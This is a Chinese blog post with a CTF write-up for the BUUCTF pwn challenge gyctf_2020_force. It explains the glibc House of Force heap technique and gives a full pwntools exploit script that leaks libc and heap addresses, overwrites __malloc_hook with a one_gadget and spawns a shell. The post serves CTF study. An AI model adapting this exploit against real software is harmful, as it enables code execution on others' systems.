BUUCTF【gyctf_2020_force】(house of force)

已于 2022-01-29 15:38:51 修改
阅读量709 收藏 1
点赞数 3
分类专栏: buuctf刷题 文章标签: pwn
于 2022-01-29 15:35:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51055545/article/details/122744139
版权

一道题学习 House of force

首先说明一下House of force的利用条件:

1.能够通过堆溢出等方法控制到topchunk的size

2.分配的大小没有限制,即可以申请任意大小的堆块

3.能够泄露出堆地址(topchunk)

House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的值且很大时 (如0xffffffffffffffff),可以使得 top chunk 指向我们期望的任何位置,这就相当于一次任意地址写.

我们通过buu的一道例题来学习一下house of force.

例行检查:在这里插入图片描述64位程序,保护机制全开

IDA分析:
在这里插入图片描述

add()函数中没有对申请的大小进行判断,符合了第二个条件,注意到输入内容时,不管申请多大的堆块,我们都只能写入0x50大小的内容,此时我们申请小于0x50的堆,就可以导致溢出,满足第一个条件,可以看到程序把我们申请的堆地址给打印出来了,就可以算出topchunk地址,满足第三个条件。

利用思路:

1.申请一个很大的堆块,系统会调用libc下方的mmap分配,此时通过具体的偏移算出libc地址

2.通过溢出覆盖topchunk的size为0xffffffffffffffff,在通过算出topchunk和malloc_hook的偏移,劫持malloc为one_gadget,

3.申请触发one_gadget

exp:

from pwn import *

elf = ELF('./gyctf_2020_force')
io = remote('node4.buuoj.cn',27332)
#io = process('./gyctf_2020_force')
#libc = elf.libc
libc = ELF('./libc-2.23.so')
context(log_level='debug')

def choice(c):
	io.recvuntil('2:puts\n')
	io.sendline(str(c))

def add(size,content):
	choice(1)
	io.recvuntil('size\n')
	io.sendline(str(size))
	io.recvuntil('t\n')
	io.sendline(content)
#泄露libc
choice(1)
io.recvuntil('size\n')
io.sendline(str(0x200000))#申请一个很大的堆块,调用mmap分配

io.recvuntil('0x')
leak = int(io.recv(12),16)
success(hex(leak))
libc_base = leak+0x200ff0
success(hex(libc_base))
io.recvuntil('t\n')
io.sendline('AA')
#泄露堆地址
choice(1)
io.recvuntil('size\n')
io.sendline(str(0x18))
io.recvuntil('0x')
leak1 = int(io.recv(12),16)
success(hex(leak1))
heap_base = leak1-0x10
success(hex(heap_base))
io.recvuntil('t\n')
io.sendline('A'*0x10 + p64(0) + p64(0xFFFFFFFFFFFFFFFF))

top_chunk = heap_base + 0x20
success(hex(top_chunk))

malloc_hook = libc_base + libc.sym['__malloc_hook']
success(hex(malloc_hook))
offset = malloc_hook - top_chunk
success(hex(offset))
one = [0x45216,0x4526a,0xf02a4,0xf1147]
add(offset-0x33,'A'*3)
one_gadget = libc_base + one[1]
success(hex(one_gadget))
realloc = libc_base + libc.sym['realloc']
success(hex(realloc))

add(0x20,'A'*0x8 + p64(one_gadget) + p64(realloc+0x10))

choice(1)
io.recvuntil('size\n')
io.sendline(str(0x18))

#gdb.attach(io)

io.interactive()

在这里插入图片描述

BUUCTF-PWN gyctf_2020_forcehouse of force
weixin_44145820的博客
04-15 1460
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
Pwn-gyctf_2020_force
fayinq的博客
03-13 454
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
[BUUCTF]PWN——gyctf_2020_forcehouse of force
mcmuyanga的博客
01-29 1115
gyctf_2020_force 附件 步骤
house of forcegyctf_2020_force
huzai9527的博客
04-20 193
house of forcegyctf_2020_force 1.ida分析 申请任意大小的堆块,存在堆溢出 2.思路 申请一个较大的堆块,泄露libc的地址 修改top chunk的地址为0xffffffffffffffff 计算top chunk到malloc_hook-0x33的距离(malloc_hook-0x23 是一个合法的chunk)其实这个0x30-0x37应该都可以,malloc在分配的时候会自己进行对齐 通过申请到malloc上方的chunk修改mall
gyctf_2020_force
z1r0的博客
01-25 893
gyctf_2020_force 查看保护 当size小于0x50时堆溢出,这里只有add没有show和edit。size随便申请多大都可以。 house of force吧,改写top chunk的size为0xFFFFFFFFFFFFFFFF因为在glibc2.23下的源码中这里是无符号写成-1时则为0xFFFFFFFFFFFFFFFF。详细可以看z1r0’s blog 当创建top chunk可以分配的大小的,所创建的chunk的位置为top chunk与该chunk size的偏移 所以这里可以
gyctf_2020_force【write up】
m0_73756460的博客
04-11 223
BUUCTF刷题gyctf_2020_force【write up】
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2434
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1709
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
House of force —— gyctf_2020_force
PLpa的博客
08-13 972
前言: House of force是属于House of xxx系列的利用方法,House of xxx是2004年《The Malloc Maleficarum-Glibc Malloc Exploitation Techniques》中提出的一系列针对glibc堆分配机制的利用方法。 想要利用House of force,需要以下条件: 1.能够以溢出等方式控制top chunk的size域。 2.能够自由的分配堆的大小 解题思路 保护机制 保护全开,64位。 IDA查看伪代码 程序有两个功能,
gyctf_2020_document
z1r0的博客
02-28 207
gyctf_2020_document 查看保护 这里有一个uaf,libc2.23下的话可以直接泄露出Libc了。 edit的时候改的是+16也就是0x10 攻击思路:因为有个uaf,chunk 0可以直接泄露libc。然后最简单的就是改指向堆的指针了,edit的时候改的是0x10所以这里可以对0x91那个被释放的堆进行切割,切两个之后,chunk 0就可以改chunk3的指向堆的指针了。这个时候改chunk3的指向指针为hook,再edit时就可以改hook为one_gadget了。 from p
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink)
mcmuyanga的博客
03-02 1523
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
pwngyctf_2020_borrowstack
Nothing
03-02 1704
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2426
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
GYCTF2020_Writeup
Lethe's Blog
03-15 2736
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
gyctf_2020_document【buu刷题】
m0_73756460的博客
07-04 95
gyctf_2020_document【buu刷题】
BUUCTF SROP UAF House of Force 修改free_got为system 静态链接
carol2358的博客
07-12 532
ciscn_2019_es_7 ciscn_2019_es_7 贴张表: ip是接下去要干的,sp是这里干完接下来要干的地址(大概XD) 怎么找binsh看我之前这篇: https://blog.youkuaiyun.com/carol2358/article/details/105643009 rsi 当然直接调试找也是可以的 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_es_7' loca
[GYCTF2020]Blacklist1-BUUCTF-详解
最新发布
chinese_cabbage0的博客
02-05 2060
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
__attribute__ force
09-15
__attribute__ force是GCC编译器的一个特性,它用于强制执行某些行为。当应用于函数声明时,force属性告诉编译器强制内联函数,即使优化级别不够高也会进行内联展开。当应用于变量声明时,force属性告诉编译器强制将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值